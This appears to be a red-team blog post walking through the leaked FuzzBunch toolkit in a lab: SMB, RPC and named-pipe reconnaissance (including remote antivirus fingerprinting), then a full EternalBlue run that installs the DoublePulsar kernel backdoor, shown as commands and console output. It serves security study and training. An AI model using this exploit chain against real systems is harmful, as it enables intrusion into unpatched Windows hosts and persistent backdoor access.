/ ShadowBrokers

Match Made In The Shadows: Part [2]

Intro

At this point of the post, I assume you have set up a full environment from Part [1] post here. Today we will be covering using FuzzBunch (FB) for exploitation, and the tradecraft considerations they took in the design and what it says about the prowess of this actor. As a Red Teamer, I often find skill in the operator and their knowledge of the toolkit vs capbaility of the tool. This terminology is referred to as a Tool Champion[1] by this actor in a few cases.

In this series we are going to cover the following:

  • Environment setup and configuration
  • Walk through an exploit scenario and tutorial
  • Cover tradecraft and the advanced nature of the DanderSpritz agent
  • Additional deep dive into components

This post will only cover portion two (2) as the material and setup are dense.

FuzzBunch Touches

Before even considering exploitation I'm sure as any good operator would do they would do some level of checks, one of the exciting toolsets packaged inside FB is "Touches". Touch is a suite of tools that allow an operator to perform effective integration against targets as well as pull back data and fingerprint a host. This functionality is a typical perspective or function you may have you used inside Metasploit in the past.

SmbTouch (ST)

When dealing with SMB, all cards are on the table for exploitation, being one of the top targets in a Windows enviroment. When in environments with exclusion trusted resources within a domain, you're going to see Port 445 open. ST was built exactly for this scenario.

This tool allows an operator to check the targets OS, Pipes and if the target is vulnerable to any exploits within FB. One thing to note is if you ever had to deal with SMB packet analysis you may be familiar with Anonymous sessions. By default, ST uses this to enumerate the host, if a credential data happens to be provided, that has access to the target it will be able to authenticate to the hosts NamedPipes. This technique is valid for any host over Win7 since XP was the last version that supported anonymous access to named pipes. Bellow is example output from my lab machine:


[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Smbtouch) > execute

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                192.168.251.136
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              192.168.251.136
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 6.1 build 7601
    Windows 7 Enterprise 7601 Service Pack 1

[*] Trying pipes...
        [-] spoolss    - Not accessible (0xC0000022 - NtErrorAccessDenied)
        [-] browser    - Not accessible (0xC0000022 - NtErrorAccessDenied)
        [-] lsarpc     - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Not Vulnerable]
        ETERNALROMANCE  - Named pipe required for exploit
        ETERNALCHAMPION - Not a browser for unauth, pipe/share required

[Vulnerable]
        ETERNALBLUE     - DANE

[*] Writing output parameters

[+] Target is vulnerable to 1 exploit
[+] Touch completed successfully

[+] Smbtouch Succeeded

Rpctouch

This module is a meta-module of the Smbtouch it seems, allowing an operator to set flags to target Architecture, Langauge, and versioning. The Arch will not work unless you have access to the "Browser" pipe of course.

fb > use Rpctouch

[!] Entering Plugin Context :: Rpctouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Rpctouch) > execute

[!] Preparing to Execute Rpctouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Rpctouch
================

Name                 Value
----                 -----
NetworkTimeout       60
TargetIp             192.168.251.136
TargetPort           445
NetBIOSName          *SMBSERVER
TouchLanguage        False
TouchArchitecture    False
Protocol             SMB

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] SMB String: Windows 7 Enterprise 7601 Service Pack 1 (WIN7SP1)
[+] Rpctouch Succeeded

ArchTouch (AT)

As shown above, RT enumerates the version, one thing to note is that using this method you will not be able to enumerate the Architecture since you will not have access to the "Browser" pipe[2]. It seems that when connecting to an DCE-RPC endpoint on the port (49152), AT sends a crafted packet to BIND to the service. When this takes place, a few transactional structures are passed to optimize performance between the two endpoints such as version, and CTX items. This process prompts a response from the RPC mapper, indicating an acceptance or rejection of each CTX item. Due to nature of this tool, I was inherently curious about how it worked as I didn't know this was possible to do on a Windows 7 machine.

DCE/RPC Bind call (Req)

When AT send its first packet, it starts a TCP handshake and sends an RPC Bind request. Packaged in this request is two (2) items of interest. A 32-bit Network Data Representation (NDR) and a 64 bit NDR.

The NDR wire protocol, also referred to as transfer syntax, enables RPC calls to traverse the network. The wire protocol defines the wire representation of an RPC call, such as the order in which data members are marshaled, alignment of data on the wire, additional information included with the data, and other issues.[3]

Bellow is a HEX+ASCII dump and tree dump from Wireshark if intrested:

0000   05 00 0b 03 10 00 00 00 74 00 00 00 00 00 00 00  ........t.......
0010   d0 16 d0 16 00 00 00 00 02 00 00 00 00 00 01 00  ................
0020   80 bd a8 af 8a 7d c9 11 be f4 08 00 2b 10 29 89  .....}......+.).
0030   01 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00  .....]..........
0040   2b 10 48 60 02 00 00 00 01 00 01 00 80 bd a8 af  +.H`............
0050   8a 7d c9 11 be f4 08 00 2b 10 29 89 01 00 00 00  .}......+.).....
0060   33 05 71 71 ba be 37 49 83 19 b5 db ef 9c cc 36  3.qq..7I.......6
0070   01 00 00 00                                      ....

Distributed Computing Environment / Remote Procedure Call (DCE/RPC) Bind, Fragment: Single, FragLen: 116, Call: 0
    Version: 5
    Version (minor): 0
    Packet type: Bind (11)
    Packet Flags: 0x03
    Data Representation: 10000000 (Order: Little-endian, Char: ASCII, Float: IEEE)
    Frag Length: 116
    Auth Length: 0
    Call ID: 0
    Max Xmit Frag: 5840
    Max Recv Frag: 5840
    Assoc Group: 0x00000000
    Num Ctx Items: 2
    Ctx Item[1]: Context ID:0, MGMT, 32bit NDR
        Context ID: 0
        Num Trans Items: 1
        Abstract Syntax: MGMT V1.0
        Transfer Syntax[1]: 32bit NDR V2
            Transfer Syntax: 32bit NDR UUID:8a885d04-1ceb-11c9-9fe8-08002b104860
            ver: 2
    Ctx Item[2]: Context ID:1, MGMT, 64bit NDR
        Context ID: 1
        Num Trans Items: 1
        Abstract Syntax: MGMT V1.0
        Transfer Syntax[1]: 64bit NDR V1
            Transfer Syntax: 64bit NDR UUID:71710533-beba-4937-8319-b5dbef9ccc36
            ver: 1

DCE/RPC Bind call (Rep)

If the endpoint replies it sends back the proper NDR to serialize with for optimal performance (from the research I have seen). In this packet is two (2) CTX items.

First being a rejection of one platform:

0000   02 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0010   00 00 00 00 00 00 00 00                          ........

Ctx Item[1]: Provider rejection, PNIO (Implicit Ar)
    Ack result: Provider rejection (2)
    Ack reason: Proposed transfer syntaxes not supported (2)
    Transfer Syntax: PNIO (Implicit Ar)
    Syntax ver: 0

Second being the Acceptance of supported provider, denoting the endpoint target arch. A nifty method I didn't know about, maybe I'm just behind the times haha!

0000   00 00 00 00 33 05 71 71 ba be 37 49 83 19 b5 DB  ....3.qq..7I....
0010   ef 9c cc 36 01 00 00 00                          ...6....

Ctx Item[2]: Acceptance, 64bit NDR
    Ack result: Acceptance (0)
    Transfer Syntax: 64bit NDR
    Syntax ver: 1

NOTE: NMAP does not have a check for this after some research it seems... hmm
Finally using this module proves simple:

fb > use Architouch

[!] Entering Plugin Context :: Architouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Architouch) > execute

[!] Preparing to Execute Architouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [49152] :
[+] (TCP) Local 192.168.251.136:49152

[+] Configure Plugin Remote Tunnels


Module: Architouch
==================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        49152

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting...success
[*] Binding to RPC...success

[+] Target is x64

[+] Touch completed successfully

[+] Architouch Succeeded

Namedpipetouch

One of the major reasons I took the time to do this blog was not to recap on the leak of these tools, but to de dive on the thought process behind the tool usage. We can always learn from others, and NPT is a great example of this. At first glance this module does not provide much insight into the use case for such a tool:

fb > use Namedpipetouch

[!] Entering Plugin Context :: Namedpipetouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

fb Touch (Namedpipetouch) > execute

[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Namedpipetouch
======================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
UsingNbt          False
PipeList          ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',
                   '\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '
                  \PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\
                  afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus
                  er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9
                  eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8
                  ... (plus 47 more lines)
DescList          ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'
                  , 'OS Pipe: print spooler', '360 Safe', '360 Safe'
                  , 'alwil Avast professional 4.8 Avast Internet Sec
                  urity v5.0', 'Avast Internet Security 5.0', 'Avast
                   Internet Security 5.0', 'Avast pro 4.8 or Avast I
                  S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',
                  ... (plus 35 more lines)
Protocol          SMB

PipeList - A hidden gem

Something fascinating I have not thought about (Granted I don't have Eternal* exploits lying around) is the way exploits are most likely deployed. Any exploit developer worth his salt performs some Continous Integration (CI) and that most likely includes the testing of AV. After using this tool in the lab; I hypothesized an exploit of this stature most likely came with rules or other checks that must be done to ensure they aren't putting it at risk. The dollar value of such a tool has to be extremely high I would imagine.

Must of the checks turn out to be for AV? That seems to line up with a workflow that would make sense to deploy EternalBlue:

FB -> Smbtouch -> Rpctouch? -> Namedpipelist checks -> EternalBlue

This type of check for a Red Team is invaluable for enumerating AV software remotely, in many cases this is just speculation of an Unkown and a risk of operating.
Red Team: Are you checking for this? as this is an amazing check to add to the toolkit!

Bellow is the final output denoting specific pipes found (Take note of 2010, an observation on the last update to pipe list they are checking for?):

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes

[+] Testing for OS Pipe: computer browser.
[+] Testing for OS Pipe: lsass rpc
        [+] Pipe Found: \PIPE\lsarpc


[+] Testing for OS Pipe: print spooler.
[+] Testing for 360 Safe..
[+] Testing for all Avast professional 4.8 Avast Internet Security v5.0.
[+] Testing for Avast Internet Security 5.0.
[+] Testing for Avast pro 4.8 or Avast IS v5.0.
[+] Testing for AVG IS 8.5.......
[+] Testing for AVG IS 8.5-9.0.
[+] Testing for AVG IS 9.0.646............
[+] Testing for avira antivirus personal edition premium v7.06, avira premium security suite v7.
[+] Testing for avira premium sec suite  v8.......
[+] Testing for Avira premium security suite v8.
[+] Testing for BitDefender 2010 v13.
[+] Testing for BitDefender TotalSec 2010 v13.0.11...
[+] Testing for BitDefender TotalSec 2010 v13.0.11 Bit Defender Total Security 2009...
[+] Testing for FSecure 2010...........................
[+] Testing for McAfee 8.7i..
[+] Testing for Norton Internet Security 2010.
[+] Testing for Norton IS 2008.
[+] Testing for Norton360 v4; Norton IS 2009; Norton IS 2010; Norton 360 v4.
[+] Testing for Norton360 v4.
[+] Testing for Outpost Security Suite Pro 2009 v6.5.
[+] Testing for Panda IS 2010 v15....
[+] Testing for Sophos 9.0.
[+] Testing for TrendMicro IS 2010 v17.50.
[+] Testing for VMWare Host.

[*] Summary: 1 pipes found
        OS Pipe: lsass rpc - \PIPE\lsarpc
[+] Namedpipetouch Succeeded

FuzzBunch Specials

One of the more popular portions of the dump was the mass amount of exploits, which many of the exploits are still unpatched on older systems such as XP/2003. Which while everyone took the time patch for EB, ESTEEMAUDIT and others are just as viable options on older systems once internal to a network.

To keep this blog focused and on the topic, we will only be using EternalBlue and analyzing the setup, prep, execution of EB.

FuzzBunch Internals

We talked a bit earlier that FB is an exploitation framework, one that resembles a Metasploit. Being modular requires the ability to adopt new exploits, code, etc. An XML file also accompanies each exploit and module with the required/optional fields.

Analyzing EternalBlue's fields (XML)

A few things to note is the ability to launch via a "DaveProxyPort" at this point I'm speculating this is some redirector as I have not gotten time to look deep into this. Standard options exist:

  • Target IP
  • Target Port
  • Validate Implant
  • Validate Target
- <inputparameters>
- <parameter hidden="true" type="TcpPort" name="DaveProxyPort" description="DAVE Core/Proxy Hookup connection port">
  <default>0</default> 
  </parameter>
<-----------SNIP---------->
  <parameter xdevmap="ETERNALBLUE_DOUBLEPULSAR_PRESENT" type="Boolean" name="DoublePulsarPresent" description="Set to true if the DOUBLEPULSAR backdoor was already installed and the exploit did not have to be thrown" /> 
  </outputparameters>
- <redirection>
  <local protocol="TCP" listenaddr="TargetIp" listenport="TargetPort" closeoncompletion="true" destaddr="//identifier" destport="//service[name='SMB']/port" /> 

Analyzing EternalBlue's Targets (XML)

The first thing of interest is dating the toolset to the best of my ability. It has already been known that this exploit affects nearly all platforms of Windows. But what is interesting is this exploit manifest only shows support up to Windows 7 and 2008R2 Server! We can gain some insight in that knowing the authors would have of course added support to this tool when the operating systems where released. Dating this tool back or before Windows 2012, an interesting piece of the puzzle.

<os name="Windows XP" family="windows" architecture="x86 32-bit">
  <bindtovalue name="Target" value="XP" /> 
  </os>
<---------------SNIP-------------->
- <os servicepack="1" name="Windows 7" family="windows" architecture="x64 64-bit">
  <bindtovalue name="Target" value="WIN72K8R2" /> 
  </os>

FuzzBunch Explosion Tutorial

One of the exciting aspects of FB is its clear and concise protection of operator mistake. Its simple yet powerful in the way it always checks with its user before moving forward, and in some cases multiple times. An example of the prowess of the operators and tools being deployed, it has to be one of the most professional platforms I have ever seen in using exploits and mistake prevention.

EternalBlue Setup

Its quite easy, all you have to is use the use command to drop into a module. Then if you type execute it will walk you through all of the proper settings.

fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

[*] Applying Session Parameters
[*] Running Exploit Touches


[!] Enter Prompt Mode:: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              192.168.251.136
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] : no
[!] Skipping Prompt

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              192.168.251.136
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :

Eternalblue Throw

Once all settings pass the checks, and you work your way through the above, you will be able to send the exploit. The exploit at a high level does the following:

  1. Creates an Anonymous SMB session
  2. Runs correlated "Touch" plugin
  3. Validates your exploit settings match returned target
  4. Send initial Exploit buffer
  5. Creates another Anon SMB session
  6. Send the last fragment to exploit
  7. Sends egg / Disconnect
  8. Checks install of Kernel level backdoor
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (41 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
0x00000010  72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63  rise 7601 Servic
0x00000020  65 20 50 61 63 6b 20 31 00                       e Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending SMBv2 buffers
        .........DONE.
    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x64 (64-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

Eternalblue Exploit Methodology

One of the interesting aspects of this exploit is picking the type of loader they decided to deploy. Which in many cases makes total sense, allowing operators to be fluid and have options in different environmental constraints. A great example as we introduce DoublePulsar next is the ability to use this backdoor to execute user-mode code of choice. An obvious benefit to a layered option reducing the overall implants at risk at any given time in a failed exploit scenario.

DoublePulsar

Man one of my favorites in this toolkit is the expandability of nearly all toolsets as we mentioned earlier. DoublePulsar (DP) does some interesting magic that can be covered in way more detail here.

DoublePulsar Features

To interact with our freshly created Back Door, we can use DP to send different commands and install our next stage of the implant.

DoublePulsar Arch

First select the proper Architecture that we obtained from our EB output [+] Ping returned Target architecture: x64 (64-bit) in the prior exploit.

fb > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.251.136

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [192.168.251.136] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor
   
[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 1
[+] Set Architecture => x64
DoublePulsar Operation

In some cases, it would make sense that you would want to reverify the architecture and the operation of the Implant if you are doing maintenance or just coming back on to an Operation that may have been down for a large portion of time. So let's start with a Ping:

[?] Function [0] : 1
[+] Set Function => Ping


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
Protocol          SMB
Architecture      x64
Function          Ping

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
    SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
    Target OS is: 7 x64
    Target SP is: 1
        [+] Backdoor installed
        [+] Command completed successfully
[+] Doublepulsar Succeeded

Next in the case of pulling out of enviroment it even supplies a "Uninstall" function:

fb Payload (Doublepulsar) > set Function Uninstall
[+] Set Function => Uninstall
fb Payload (Doublepulsar) > execute

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.251.136] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.251.136:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          192.168.251.136
TargetPort        445
Protocol          SMB
Architecture      x64
Function          Uninstall

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x041A927F
    SMB Connection string is: Windows 7 Enterprise 7601 Service Pack 1
    Target OS is: 7 x64
    Target SP is: 1
        [+] Backdoor installed
        [.] Sending burn implant message
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor killed
        [+] Command completed successfully
[+] Doublepulsar Succeeded

Final Thoughts

We just really brushed the surface of the entire series today, next post will be focusing on the usage and deployment of code via DP. Cheers beer-mug_1f37a NOTE: Not A IPA


  1. https://github.com/x0rz/EQGRP/blob/33810162273edda807363237ef7e7c5ece3e4100/Linux/etc/opscript.txt#L11552 ↩︎

  2. https://technet.microsoft.com/en-us/library/jj852166(v=ws.11).aspx ↩︎

  3. https://msdn.microsoft.com/en-us/library/windows/desktop/aa378995(v=vs.85).aspx ↩︎

Alexander Rymdeko-Harvey

Alexander Rymdeko-Harvey

Alexander Rymdeko-Harvey is an experienced Red Teamer. He loves to develop on offensive TTPs and has a knack for Windows internals. He prides himself on being a husband, father and prior Army.

Read More